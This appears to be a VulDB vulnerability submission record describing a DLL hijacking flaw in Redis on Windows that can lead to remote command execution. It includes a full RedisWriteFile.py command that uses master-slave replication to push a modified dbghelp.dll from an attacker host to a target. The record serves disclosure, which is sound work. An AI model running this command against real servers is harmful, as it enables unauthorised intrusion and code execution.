| Title | Redis On Windows DLL Hijacking Result in RCE When Unauthorized |
|---|
| Description | There is a dll hijacking vulnerability in the Windows version of Redis.
When Redis has unauthorized access or password disclosure, attackers can use dll writing to implement system remote command execution using the Windows version of Redis.
Use RedisWriteFile to write the modified dbghelp.dll to the designated location of the target using master slave replication.
python3 RedisWriteFile.py --rhost=192.168.41.29 --rport=6379 --lhost=192.168.41.38 --rpath="C:/Program Files/Redis/" --rfile="dbghelp.dll" --lfile="dbghelp.dll"
details can be seen on https://www.cnblogs.com/J0o1ey/p/16829380.html |
|---|
| Source | ⚠️ https://www.cnblogs.com/J0o1ey/p/16829380.html |
|---|
| User | J0o1ey (UID 30618) |
|---|
| Submission | 10/26/2022 12:05 (3 years ago) |
|---|
| Moderation | 10/28/2022 07:39 (2 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 212416 [Redis on Windows dbghelp.dll uncontrolled search path] |
|---|
| Points | 20 |
|---|